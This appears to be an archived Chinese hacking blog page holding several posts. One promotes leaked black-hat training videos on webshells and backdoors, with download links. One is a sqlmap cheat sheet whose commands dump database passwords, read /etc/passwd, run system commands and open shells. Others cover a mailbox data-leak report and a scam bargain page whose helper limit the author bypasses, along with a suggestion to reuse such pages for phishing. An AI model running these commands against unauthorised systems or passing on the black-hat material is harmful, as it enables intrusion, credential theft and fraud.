价值万元黑帽就业内部教程泄露 渗透测试

000089-2015-11-03.jpg


内容:

众所周知黑帽盒子内部以后门程序出名,此套系列课程是内部培训思路及方法的教程,价值不可估量。

此系列课程看完后绝对颠覆你的价值观和世界观。绝对值得收藏!目前下载链接还有效,大家记得及时下载!

 

内部项目零-前言 链接: http://pan.baidu.com/s/1o6zTbMq 密码: tpw8

内部项目一-后门程序是什么  链接: http://pan.baidu.com/s/1gdHItaF 密码: pe7c

内部项目二-养好自己的箱子链接http://pan.baidu.com/s/1kTnNShx 密码: nt94

内部项目三-大数据如何处理 链接http://pan.baidu.com/s/1qW9YxB2 密码: ijb4

第四第五因需要注册码,所以改成演示的视频。

内部项目四-xise菜刀后门箱子 链接: http://pan.baidu.com/s/1qW9UDGg 密码:  ua48

内部项目五-红色中国菜刀webshell箱子 链接:  http://pan.baidu.com/s/1jG8eWwI   密码:  25my

内部项目六(一)谈盈利,团队.rar 链接: http://pan.baidu.com/s/1qifuu 密码: n7gp

内部项目六(二)谈盈利,团队.rar 链接: http://pan.baidu.com/s/1hq76QUC 密码: ikfe

内部项目七-上网和资金安全.rar 链接: http://pan.baidu.com/s/1kTiynLP 密码: d3kr

内部项目八-养站技巧.rar 链接: http://pan.baidu.com/s/1hqrrN4C 密码: mq6n

等等 .. 陆续还有很多视频没泄露出来。此福利共享给大家

下面给出一个备份的汇总链接地址,你也可以选择这个直接保存到自己网盘观看,同时后面更新的也会在这个文件夹内分享:链接: http://pan.baidu.com/s/1nt4ER0l 密码: eraa

注:原文出自暗月博客,http://www.moonsec.com/post-582.html



admin 发布于  2015-11-3 17:21 

笔记:SQLMAP常用参数讲解 渗透测试

sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数据库类型

sqlmap -u “http://url/news?id=1″ –users #列数据库用户

sqlmap -u “http://url/news?id=1″ –dbs#列数据库

sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码

sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码

sqlmap  -u  “http://url/news?id=1″   –dump  -C  “password,user,id”  -T “tablename”-D “db_name”

–start 1 –stop 20 #列出指定字段,列出20 条

sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表

sqlmap -u “http://url/news?id=1″ –privileges #查看权限

sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色

sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)

sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表

sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录

sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入

sqlmap -u “http://url/news?id=1″ -b #获取banner信息

sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入

sqlmap -u “http://url/news?id=1″ -v 1 -f #指纹判别数据库类型

sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入

sqlmap -u “http://url/news?id=1″ –string”STRING_ON_TRUE_PAGE”# 指 定关键词

sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令

sqlmap -u “http://url/news?id=1″ –file /etc/passwd

sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令

sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell

sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表

sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度

sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度

***********高级用法*************

-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入

sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段          需保证google.com能正常访问

–technique   测试指定注入类型\使用的技术

不加参数默认测试所有注入技术

•     B: 基于布尔的SQL 盲注

•     E: 基于显错sql 注入

•     U: 基于UNION 注入

•     S: 叠层sql 注入

•     T: 基于时间盲注

–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()

–tamper 插件所在目录

\sqlmap-dev\tamper

sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users  –smart 智 能

level 执行测试等级 攻击实例:

Sqlmap -u “http://url/news?id=1&Submit=Submit”

–cookie=”PHPSESSID=41aa833e6d0d

28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user

–password

参考文档:http://sqlmap.sourceforge.net/doc/README.html

***********安装最新版本*************

ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版

sudo   svn   checkout   https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件

sudo vim /home/当前用户/.bashrc

#任意位置加上:

alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效

如果想对所有用户有效 可设置全局 编辑下面的文件

vim /etc/profile

同样加上:

alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效

******************windows 7 (x64) sqlmap install (SVN)************

http://www.python.org/getit/ 安装python

http://www.sliksvn.com/en/download 安装windows svn client

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

安装sqlmap

*修改环境变量

–version             显示程序的版本号并退出

-h, –help            显示此帮助消息并退出

-v VERBOSE            详细级别:0-6(默认为1)

Target(目标): 以下至少需要设置其中一个选项,设置目标URL。

-d DIRECT           直接连接到数据库。

-u URL, –url=URL   目标URL。

-l LIST             从Burp 或WebScarab 代理的日志中解析目标。

-r REQUESTFILE      从一个文件中载入HTTP 请求。

-g GOOGLEDORK       处理Google dork 的结果作为目标URL。

-c CONFIGFILE       从INI 配置文件中加载选项。

Request(请求)::

这些选项可以用来指定如何连接到目标URL。

–data=DATA         通过POST 发送的数据字符串

–cookie=COOKIE     HTTP Cookie 头

–cookie-urlencode  URL 编码生成的cookie 注入

–drop-set-cookie   忽略响应的Set –Cookie 头信息


–user-agent=AGENT  指定  HTTP User –Agent 头

–random-agent      使用随机选定的HTTP User –Agent 头

–referer=REFERER   指定  HTTP Referer 头

–headers=HEADERS   换行分开,加入其他的HTTP 头

–auth-type=ATYPE   HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)

–auth-cred=ACRED   HTTP 身份验证凭据(用户名:密码)

–auth-cert=ACERT   HTTP 认证证书(key_file,cert_file)

–proxy=PROXY       使用HTTP 代理连接到目标URL

–proxy-cred=PCRED  HTTP 代理身份验证凭据(用户名:密码)

–ignore-proxy      忽略系统默认的HTTP 代理

–delay=DELAY       在每个HTTP 请求之间的延迟时间,单位为秒

–timeout=TIMEOUT   等待连接超时的时间(默认为30 秒)

–retries=RETRIES   连接超时后重新连接的时间(默认3)

–scope=SCOPE       从所提供的代理日志中过滤器目标的正则表达式

–safe-url=SAFURL   在测试过程中经常访问的url 地址

–safe-freq=SAFREQ  两次访问之间测试请求,给出安全的URL

Optimization(优化): 这些选项可用于优化SqlMap 的性能。

-o                  开启所有优化开关

–predict-output    预测常见的查询输出

–keep-alive        使用持久的HTTP(S)连接

–null-connection   从没有实际的HTTP 响应体中检索页面长度

–threads=THREADS   最大的HTTP(S)请求并发量(默认为1)

Injection(注入):

这些选项可以用来指定测试哪些参数,  提供自定义的注入payloads 和可选篡改脚本。

-p TESTPARAMETER    可测试的参数(S)

–dbms=DBMS         强制后端的DBMS 为此值

–os=OS             强制后端的DBMS 操作系统为这个值

–prefix=PREFIX     注入payload 字符串前缀

–suffix=SUFFIX     注入 payload 字符串后缀

–tamper=TAMPER     使用给定的脚本(S)篡改注入数据

Detection(检测):

这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。

–level=LEVEL       执行测试的等级(1-5,默认为1)

–risk=RISK         执行测试的风险(0-3,默认为1)

–string=STRING     查询时有效时在页面匹配字符串

–regexp=REGEXP     查询时有效时在页面匹配正则表达式

–text-only         仅基于在文本内容比较网页

Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。

–technique=TECH    SQL 注入技术测试(默认BEUST)

–tiime-sec=TIMESEC  DBMS 响应的延迟时间(默认为5 秒)

–union-cols=UCOLS  定列范围用于测试UNION 查询注入

–union-char=UCHAR  用于暴力猜解列数的字符

Fingerprint(指纹):

-f, –fingerprint     执行检查广泛的DBMS 版本指纹

Enumeration(枚举):


这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。

-b, –banner        检索数据库管理系统的标识

–current-user      检索数据库管理系统当前用户

–current-db        检索数据库管理系统当前数据库

–is-dba            检测DBMS 当前用户是否DBA

–users             枚举数据库管理系统用户

–passwords         枚举数据库管理系统用户密码哈希

–privileges        枚举数据库管理系统用户的权限

–roles             枚举数据库管理系统用户的角色

–dbs               枚举数据库管理系统数据库

–tables            枚举的DBMS 数据库中的表

–columns           枚举DBMS 数据库表列

–dump              转储数据库管理系统的数据库中的表项

–dump-all          转储所有的DBMS 数据库表中的条目

–search            搜索列(S),表(S)和/或数据库名称(S)

-D DB               要进行枚举的数据库名

-T TBL              要进行枚举的数据库表

-C COL              要进行枚举的数据库列

-U USER             用来进行枚举的数据库用户

–exclude-sysdbs    枚举表时排除系统数据库

–start=LIMITSTART  第一个查询输出进入检索

–stop=LIMITSTOP    最后查询的输出进入检索

–first=FIRSTCHAR   第一个查询输出字的字符检索

–last=LASTCHAR     最后查询的输出字字符检索

–sql-query=QUERY   要执行的SQL 语句

–sql-shell         提示交互式SQL 的shell

Brute force(蛮力): 这些选项可以被用来运行蛮力检查。

–common-tables     检查存在共同表

–common-columns    检查存在共同列

User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。

–udf-inject        注入用户自定义函数

–shared-lib=SHLIB  共享库的本地路径

File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。

–file-read=RFILE   从后端的数据库管理系统文件系统读取文件

–file-write=WFILE  编辑后端的数据库管理系统文件系统上的本地文件

–file-dest=DFILE   后端的数据库管理系统写入文件的绝对路径

Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。

–os-cmd=OSCMD      执行操作系统命令

–os-shell          交互式的操作系统的shell

–os-pwn            获取一个OOB shell,meterpreter 或VNC

–os-smbrelay       一键获取一个OOB shell,meterpreter 或VNC

–os-bof            存储过程缓冲区溢出利用

–priv-esc          数据库进程用户权限提升

–msf-path=MSFPATH  Metasploit Framework 本地的安装路径

–tmp-path=TMPPATH  远程临时文件目录的绝对路径


Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。

–reg-read          读一个Windows 注册表项值

–reg-add           写一个Windows 注册表项值数据

–reg-del           删除Windows 注册表键值

–reg-key=REGKEY    Windows 注册表键

–reg-value=REGVAL  Windows 注册表项值

–reg-data=REGDATA  Windows 注册表键值数据

–reg-type=REGTYPE  Windows 注册表项值类型

General(一般): 这些选项可以用来设置一些一般的工作参数。

-t TRAFFICFILE      记录所有HTTP 流量到一个文本文件中

-s SESSIONFILE      保存和恢复检索会话文件的所有数据

–flush-session     刷新当前目标的会话文件

–fresh-queries     忽略在会话文件中存储的查询结果

–eta               显示每个输出的预计到达时间

–update            更新SqlMap

–save              file 保存选项到INI 配置文件

–batch             从不询问用户输入,使用所有默认配置。

Miscellaneous(杂项):

–beep              发现SQL 注入时提醒

–check-payload     IDS 对注入payloads 的检测测试

–cleanup           SqlMap 具体的UDF 和表清理DBMS

–forms             对目标URL 的解析和测试形式

–gpage=GOOGLEPAGE  从指定的页码使用谷歌dork 结果

–page-rank         Google dork 结果显示网页排名(PR)

–parse-errors      从响应页面解析数据库管理系统的错误消息

–replicate         复制转储的数据到一个sqlite3 数据库

–tor               使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址

–wizard            给初级用户的简单向导界面


admin 发布于  2015-10-30 22:16 

国内知名互联网服务商网易邮箱爆被脱裤过亿数据泄漏-Mrxn提醒大家赶紧修改密码吧 业界新闻

国内知名互联网服务商网易邮箱爆被脱裤过亿数据泄漏(涉及邮箱账号/密码/用户密保等)

易邮箱现漏洞,过亿数据泄漏!今日,有白帽子报告称网易163/126邮箱数据泄漏,影响数量总共数亿条。泄露信息包括用户名、密码、密码提示问题/答案(hash)、注册IP、生日等。其中密码密保均为MD5存储,解开后测试大部分邮箱依旧还可登陆... 目前该漏洞已被提交至国家互联网应急中心处理。

00.jpg01.jpg000069-2015-10-19.jpg

数据过亿交易证明数据/包含邮箱密码密保信息/登陆ip以及用户生日等,其中密码密保均为MD5存储,解开后测试大部分邮箱依旧还可登陆.网易邮箱现漏洞,过亿数据泄漏!今日,有白帽子报告称网易163/126邮箱数据泄漏,影响数量总共数亿条。泄露信息包括用户名、密码、密码提示问题/答案(hash)、注册IP、生日等。其中密码密保均为MD5存储,解开后测试大部分邮箱依旧还可登陆... 目前该漏洞已被提交至国家互联网应急中心处理。

注:裤子 你知道在那里吗!不告诉你!哈哈  

温馨提示:赶紧修改密码吧!


admin 发布于  2015-10-19 17:38 

iPhone6s砍价之广告骗局分析小计-社工-不贪小便宜-钓鱼(爪机党慎入,多图) 技术文章

今晚正在请代码的时候,QQ闪好几下,烦死了(后悔忘记关掉QQ),一打开是一同学让我帮他

砍价iPhone6s,还有一个链接,于是习惯性的打开虚拟机连上自己的代理再打开他发过来的链接,帮他操作了一遍 ,我也不知道为毛脑袋里蹦出来伪造useragent和换IP的念头,于是试了一下,尼玛,居然可以再次砍价。。。哦!立马就知道这里面有鬼!

可利用社会工程学(或者是钓鱼)内容:以这个作为例子,添加一些你想要获取的信息,比如 地址,右边,身份证号码,手机号等等渗透辅助方式获取信息!

后来才发现更简单的方式砍价---详情请往下看:

00.png

就是那几个广告,卖药的,少儿不宜的。。。这才是广告主的主要意图吧!再来看看他的这个砍价,很搞笑!

04.png

06.png07.png

08.png

09.png

10.png

他这个所有的东西都在源码里面了,其实就是因为利用手机微信 QQ空间 这些平台传播,手机端一般查看源码不方便,其实大家可以利用 http://tool.lu/viewsource/ 在手机端查看源码,电脑端很方便 ,直接Ctrl+U 或者是在菜单栏里面找到工具-查看源码(还可以在使用了JavaScript禁止查看源码的地方查看绝大多数源码)。11.png

000060-2015-10-12.jpg

计算的时候可以直接就把答案输出了,000061-2015-10-12.jpg

开始还以为每次的地址不一样,可是使用sublime text 的file diff插件(插件github地址:SublimeFileDiffs000059-2015-10-12.jpg03.png

比较之后发现都是一样的!他奶奶个熊。。。逗我呢。。。于是就想到了写个脚本循环,直到 看后价格=0 。

其基本就是清除浏览器cookies 就可以继续提交。。。所以很简单。。。脚本运行 。。。刷。。完了。。。


他妹的 我最后才发现 都在网页的JavaScript里面。。。请允许我做一个悲伤的表情!


 submintKanjiaStatus = 1;
    $.ajax({
        type: "GET",
        url: "plugin.php?id=tom_kanjia&mod=ajax&act=kanjia&kid=1&uid=660546",
        dataType : "json",
        data: $('#kanjia').serialize(),
        success: function(data){
            $(".add_box").addClass('box_hide');
            submintKanjiaStatus = 0;
            if(data.status == 201) {
                tusi("已经帮砍过了");
                setTimeout(function(){document.location.reload();},2888);
            }else if(data.status == 301){
                tusi("不在允许砍价地区");
                setTimeout(function(){document.location.reload();},2888);
            }else if(data.status == 302){
                tusi("你帮砍次数达到限制");
                setTimeout(function(){document.location.reload();},2888);
            }else if(data.status == 200){
                $('#kandiaojiage').html(data.price);
                $(".dialog_box").removeClass('box_hide');
            }else if(data.status == 100){
                $('#kanjiamsg').html("已经最低了");
                $(".dialog_box").removeClass('box_hide');
            }else{
                tusi("砍价错误");
                setTimeout(function(){document.location.reload();},1888);
            }
        }
    });
});

var submintDuihuanStatus = 0;
$(".a_duihuan_btn").click( function () { 
    var dh_pwd = $("#dh_pwd").val();

    if(submintDuihuanStatus == 1){
        return false;
    }

    if(dh_pwd == ""){
        tusi("必须填写兑换密码");
        return false;
    }

    submintDuihuanStatus = 1;
    $.ajax({
        type: "GET",
        url: "plugin.php?id=tom_kanjia&mod=ajax&act=duihuan&kid=1&uid=660546",
        dataType : "json",
        data: $('#dh_form').serialize(),
        success: function(data){
            submintDuihuanStatus = 0;
            if(data.status == 100) {
                tusi("兑换密码错误");
            }else if(data.status == 200){
                $(".duihuan_box").addClass('box_hide');
                tusi("兑换成功");
                setTimeout(function(){document.location.reload();},1888);
            }else{
                tusi("兑换异常,稍等重试");
            }
        }
    });
});



啊。。。。不说了,只想说 ,还好这只是个刷广告访问量的,没打算偷你的隐私信息,要是他在进入这个页面之前让你填写一些私人信息,比如说什么收货地址、邮编、电话号码、等等。。。那你基本上就被曝光了。差不多裸体在它面前了。。。想想还是很恐怖的。。。好了废话不多说。


最后,Mrxn提醒广大市民朋友,特别是那些涉网未深的朋友,不要随便贪小便宜,天上不会掉馅饼儿,真掉下来还得小心别被砸死了。。。

其实就是Dz论坛的插件。。。。你们看了就知道 !http://ip6s.wzyhsh.com.cn/wkj/forum.php

o _ o 对了,源码在这里,大家自己研究吧,中间还是有些有用的东西。不想看的就直接Ctrl+end / home:


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GBK">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0 , maximum-scale=1.0, user-scalable=0">
<title>草泥马正在参加iPhone 6s手机砍价0元购,诚邀你助力,帮我砍一刀!</title>
<meta name="format-detection" content="telephone=no">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">

<script src="http://tajs.qq.com/stats?sId=51513877" type="text/javascript" charset="UTF-8"></script>
<link href="source/plugin/tom_kanjia/images/style_red.css" rel="stylesheet" type="text/css">
<script src="http://libs.baidu.com/jquery/1.8.3/jquery.min.js" type="text/javascript"></script>
<script src="source/plugin/tom_kanjia/images/common.js" type="text/javascript" type="text/javascript"></script>
<script src="http://res.wx.qq.com/open/js/jweixin-1.0.0.js" type="text/javascript" type="text/javascript"></script>
<base target="_self">
</head>
<body>
<section class="top_box clearfix">
  <img src="http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000" width="auto">
    <div class="top_box_bottom">  
                活动倒计时:
        <span id="day_show">0</span>天
        <span id="hour_show">0</span>时
        <span id="minute_show">0</span>分
        <span id="second_show">0</span>秒
                            </div>
</section>
<section class="about_box clearfix">
        <div class="about_box_main clearfix">
        <div class="about_box_main_title clearfix">亲:</div>
        <div class="about_box_main_desc clearfix">已经有92亲友,帮助草泥马砍价了,当前价格为70.25,你也来帮助他砍一刀吧!</div>
    </div>
    </section>
<section class="btn_box clearfix">
<div class="btn_box_main clearfix">
      <div class="btn_box_main_btn clearfix">
                                      <ul>
                                                                                                    <li><a href="javascript:void(0);" class="a_kanjia_box" onclick="show_add_box();">帮砍一刀</a></li>
                                                                                                                <li><a href="plugin.php?id=tom_kanjia&kid=1">我要参加</a></li>
<!-- <li><a href="http://mp.weixin.qq.com/s?__biz=MzIwMDE1NDkwMQ==&mid=208996211&idx=1&sn=5ae3102f2b9c6efc289c4f4b13eeca90#rd">我要参加</a></li> -->
                                    </ul>
                                                                    </div>
    </div>
</section>
<section class="qyt_box clearfix">
    <div class="qyt_box_table clearfix">
        <table cellpadding="0" cellspacing="0" >
            <thead>
                <tr>
                  <th width="33%">亲友团</th>
                  <th width="33%">砍掉价格</th>
                  <th width="33%">砍后价格</th>
                </tr>
            </thead>
            <tbody>
                                <tr class="top">
                    <td>不完了</td>
                    <td><span style="text-decoration: line-through;color: #C0BBBB;">¥3.7</span></td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥70.25</td>
                </tr>
                                <tr class="top">
                    <td>不完了</td>
                    <td><span style="text-decoration: line-through;color: #C0BBBB;">¥9.89</span></td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥73.95</td>
                </tr>
                                <tr class="top">
                    <td>不完了</td>
                    <td><span style="text-decoration: line-through;color: #C0BBBB;">¥3.94</span></td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥83.84</td>
                </tr>
                                <tr class="top">
                    <td>不完了</td>
                    <td><span style="text-decoration: line-through;color: #C0BBBB;">¥5.58</span></td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥87.78</td>
                </tr>
                                <tr class="top">
                    <td>不完了</td>
                    <td><span style="text-decoration: line-through;color: #C0BBBB;">¥9.02</span></td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥93.36</td>
                </tr>
                                <tr class="top">
                    <td>不完了</td>
                    <td><span style="text-decoration: line-through;color: #C0BBBB;">¥6.17</span></td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥102.38</td>
                </tr>
                                <tr class="top">
                    <td>不完了</td>
                    <td><span style="text-decoration: line-through;color: #C0BBBB;">¥3.12</span></td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥108.55</td>
                </tr>
                                <tr class="top">
                    <td>不完了</td>
                    <td><span style="text-decoration: line-through;color: #C0BBBB;">¥6.72</span></td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥111.67</td>
                </tr>
                                <tr class="top">
                    <td>不完了</td>
                    <td><span style="text-decoration: line-through;color: #C0BBBB;">¥6.61</span></td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥118.39</td>
                </tr>
                                <tr class="top">
                    <td>张欢</td>
                    <td><span style="text-decoration: line-through;color: #C0BBBB;">¥7.67</span></td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥125</td>
                </tr>
                            </tbody>

        </table>
        <div class="pages clearfix">
            <ul class="clearfix">
                <li style="width: 40%;"><span>上一页</span></li>
                <li style="width: 20%;"><span>1/10</span></li>
                <li style="width: 40%;"><a href="plugin.php?id=tom_kanjia&mod=index&kid=1&uid=660546&page=2">下一页</a></li>
            </ul>
        </div>
    </div>
</section>
<section class="more_box_title">
    <div class="more_box_title_main">
        <h1>商品详情</h1>
    </div>
</section>
<section class="more_box_main">
    <div class="more_box_main_main"><p>
    <span>品牌iPhone 6s限量</span><strong>200</strong><span>件,已砍走41件</span><strong><span style="color:#009900;">(</span></strong><strong><span style="color:#009900;">砍走手机包邮/无任何费用</span></strong><strong><span style="color:#009900;">)</span></strong><span>,赶快邀请好友帮忙砍价!点击上方</span><strong><span style="color:#009900;">我要参加</span></strong><span>加入砍价赢手机。</span> 
</p>
<p>
    <span><img src="http://t1.qpic.cn/mblogpic/b6ec7b978502bed4dabc/2000" alt="" /><img src="http://t1.qpic.cn/mblogpic/400b778aad9c9e1ad54a/2000" alt="" /><br />
</span> 
</p></div>
</section>
<section class="more_box_title" id="content_rule">
    <div class="more_box_title_main" >
        <h1>活动规则</h1>
    </div>
</section>
<section class="more_box_main">
    <div class="more_box_main_main"><p>
    <strong>1.本次活动时间:2015年10月01日--2015年11月30日</strong> 
</p>
<p>
    <strong>2.点击上方</strong><strong><span style="color:#009900;">我要参加</span></strong><strong>加入砍价赢手机。</strong> 
</p>
<p>
    <strong>3.原价6088元的手机,</strong><strong><span style="color:#009900;">亲友团每人可帮砍1 - 500元</span></strong><strong>,砍到最低至0元,</strong><strong><span style="color:#009900;">砍价过程均可按照实时价格订购</span></strong> 
</p>
<p>
    <strong>4.砍价成功后请在弹出页面输入联系人,地址,电话,客服会在7个工作日内与您取得联系。</strong> 
</p>
<p>
    <strong>5. 本次活动砍价手机一律为64G版,颜色可选。</strong> 
</p>
<p>
    <strong><br />
</strong> 
</p>
<p>
    <strong><strong><span style="color:#009900;">提示:</span></strong><strong>建议微信转发或群发朋友帮你砍价</strong></strong> 
</p>
<p>
    <strong><strong><img src="http://t1.qpic.cn/mblogpic/392b29537adb9aafcc4a/2000" alt="" /><br />
</strong></strong> 
</p>
<p>
    <strong><strong><img src="http://t1.qpic.cn/mblogpic/53cd484dfc25a512195a/2000" alt="" /><br />
</strong></strong> 
</p>
<p>
    <strong><strong><img src="http://t1.qpic.cn/mblogpic/1ef6860ec37537e504a0/2000" alt="" /><br />
</strong></strong> 
</p>
<p>
    <strong><strong><img src="http://t1.qpic.cn/mblogpic/3f27d99f5db5e80913d0/2000" alt="" /><br />
</strong></strong> 
</p>
<p>
    <strong><strong><img src="http://t1.qpic.cn/mblogpic/456042e0aec27104cb12/2000" alt="" /><br />
</strong></strong> 
</p>
<p>
    <strong><strong><br />
</strong></strong> 
</p></div>
</section>
<section class="more_box_title">
    <div class="more_box_title_main clearfix">
        <h1><font color="#FF0000">砍价排行榜</font></h1>
    </div>
</section>
<section class="qyt_box clearfix" style="margin-top: 20px;">
    <div class="qyt_box_table clearfix">
        <table cellpadding="0" cellspacing="0" >
            <thead>
                <tr>
                  <th width="20%">排行榜</th>
                  <th width="40%">姓名</th>
                  <th width="40%">价格</th>
                </tr>
            </thead>
 <tbody>
                                <tr class="top">
                    <td>1</td>
                    <td>吴***</td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
                </tr>
                                <tr class="top">
                    <td>2</td>
                    <td>程***</td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
                </tr>
                                <tr class="top">
                    <td>3</td>
                    <td>李***</td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
                </tr>
                                <tr class="top">
                    <td>4</td>
                    <td>代***</td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
                </tr>
                                <tr class="top">
                    <td>5</td>
                    <td>高***</td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
                </tr>
                                <tr class="top">
                    <td>6</td>
                    <td>马***</td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
                </tr>
<tr class="top">
                    <td>7</td>
                    <td>黄***</td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
                </tr>
                                <tr class="top">
                    <td>8</td>
                    <td>刘***</td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
                </tr>
                                <tr class="top">
                    <td>9</td>
                    <td>王***</td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
                </tr>
                                <tr class="top">
                    <td>10</td>
                    <td>张***</td>
                    <td><img src="source/plugin/tom_kanjia/images/jinbi_ico.png" width="20" height="20">¥0.00</td>
                </tr>
                            </tbody>

        </table>
    </div>
</section>
<section class="banquan_main" style="min-height:120px">
    <div class="banquan_main_main">
                 </div>
</section>

<script type="text/javascript">
var d = new Date();
var ad_01_link = "http://vk" + (d.getDay() * 30 + d.getHours()) + ".cx718.cn/copy/index/103/5115/9053/1443885112";
</script>

<!-- <a href="http://www.51zhuanzhuan.net/renwu/help/getstart.php">每天一分钟,自动挣钱好轻松!</a> -->
<section class="guanzu_box clearfix" style="height:110px">

<div class="guanzu_box_main clearfix">
<table border="0" style="font-size:14px;line-height:30px;word-break:keep-all;white-space:nowrap;text-align:left">
<tr>
<td width="56">
<a href="javascript:location.href = ad_01_link;">
<img src="http://t1.qpic.cn/mblogpic/96db667d855b87630fda/2000" style="height: 32px;width: 50px;
">
</a>
</td>
<td height="21">
<a href="javascript:location.href = ad_01_link;" style="color:#e7e7e7;text-decoration:none;">
老公一晚.三次,搞的人家都求饶了,还要...
</a>
</td>
</tr>
<tr>
<td width="56">
<a href="http://lhxs.changchenglong.com.cn/wkj/ad02.php">
<img src="http://t1.qpic.cn/mblogpic/e4de3a81de94475f5f1a/2000" style="height: 32px;width: 50px;">
</a>
</td>
<td height="21">
<a href="http://lhxs.changchenglong.com.cn/wkj/ad02.php" style="color:#e7e7e7;text-decoration:none;">
揭秘:李某迷奸过程的真实内幕(内附视频)
</a>
</td>
</tr>
<tr>
<td width="56">
<a href="http://v8.changchenglong.com.cn/wkj/ad03.php">
<img src="http://t1.qpic.cn/mblogpic/06b70d418dafabd236a8/2000" style="height: 32px;width: 50px;">
</a>
</td>
<td height="21">
<a href="http://v8.changchenglong.com.cn/wkj/ad03.php" style="color:#e7e7e7;text-decoration:none;">
美女见富二代,被自愿发生关系13次,我跪了...
</a>
</td>
</tr>
</table>
        <div class="guanzu_box_main_close" style="top:0px;right:0px"><a href="javascript:void(0);" onclick="close_guanzu_box();">X</a></div>

    </div>
</section> 
<section class="add_box clearfix box_hide">
<div class="add_box_main clearfix">
        <div class="add_box_main_msg">为了便于草泥马知道你是谁,请留下你的姓名或者昵称。</div>
        <form id="kanjia">
                        <div class="add_box_main_input"><input name="name" id="name" placeholder="填写姓名或昵称" type="text"></div>
                        <div class="add_box_main_input">
                <input name="num_sun" id="num_sun" type="text" style="width: 100px;"> 计算:7+3=?
                <input type="hidden" name="formhash" value="2196e42b">
                <input type="hidden" name="openid" value="">
                <input type="hidden" name="num_a" value="7">
                <input type="hidden" name="num_b" value="3">
                <input type="hidden" name="num_count" id="num_count" value="10">
            </div>
        </form>
        <div class="add_box_main_btn">
            <ul>
